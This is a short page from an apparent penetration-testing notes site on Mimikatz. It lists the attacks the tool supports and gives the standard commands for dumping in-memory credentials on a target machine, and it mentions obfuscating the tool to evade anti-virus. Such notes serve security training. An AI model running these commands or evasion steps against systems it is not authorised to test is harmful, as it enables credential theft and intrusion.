Mimikatz

Introduction

Mimikatz allows you to view and steal credentials, generate Kerberos tickets, dump credentials stored in memory and leverage attacks. Mimikatz can be easily detected by anti-virus programs. You would need to obfuscate it in order to bypass anti-virus programs.

Mimikatz can do the following attacks:

Credential Dumping
Pass-the-Hash
Over-Pass-the-Hash
Pass-the-Ticket.
Silver Ticket
Golden Ticket

Credential Dumping with Mimikatz

Once you are able to download/transfer Mimikatz to a target machine, you can now dump the credentials stored on that machine or perform some password attacks.

.\mimikatz
privilege::debug

# Attacks
sekurlsa::logonPasswords

PreviousGPP or cPassword Attack NextLinux Privilege Escalation

Last updated 6 months ago